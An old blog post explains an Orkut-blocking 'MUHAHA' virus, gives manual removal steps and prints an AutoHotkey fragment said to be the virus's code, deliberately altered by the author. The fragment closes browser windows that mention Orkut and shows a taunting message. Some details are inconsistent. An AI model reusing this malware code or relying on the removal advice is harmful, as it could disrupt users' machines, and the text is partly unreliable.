Archive

Google
Popular :- YouTube Videos RAID drivers Slow Startup SATA Disk Dos and Donts Colorful Scraps Deleting Scraps orkut Homepage
Popular GLITTER :- Good Morning Flower ButterFly Animation Portuguese Graphics Angels Hot

Wednesday, December 19, 2007

MUAHAH/ ORKUT VIRUS

Any site that becomes successful faces a lot of problem. Same is the story with orkut. You all might be knowing about Muhaha virus aka Orkut virus aka I hate FireFox virus. This not only effects orkut but also FireFox and some variants of their virus also effects You tube.


Let' look at this virus in detail.So that if you become a victim you can protect your self.


All that this virus does is stores it self in C:\heap41a. It is generally name PowerPoint.exe or firefox.exe.This virus prevents you from typing orkut in your address bar even if you type "http://go4masti.blogspot.com/" no the site wont open.


Now lets' see how to save your comp if you have been infected from this virus.

Go to task manager. Go to process tab stop all process with the name "SVCHOST.EXE" and has your Username in the Username field. If you find any process with the name "SVCHOST.EXE" but Username as System/ Network Service. then don't delete them or else your system will get shutdown. Only stop those process with user Username.


NOW go to C:\heap41a and delete all the contents. Restart your comp. Everything will work fine.


For some of you programmers here is the code of the virus. The code is 99% correct expect that a character has been removed at several places(same character has been removed ) so that you don't start spread this virus.(this wont effect your understanding of the code at all)


ifwinactive ahk_class IFrame
{
ControlGetText,ed,edit1,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{.......}
}

The ...... are to be filled appropriately. This just stops orkut

Posted by vampy at 8:57 AM  

0 Comments:

Post a Comment

Subscribe to: Post Comments (Atom)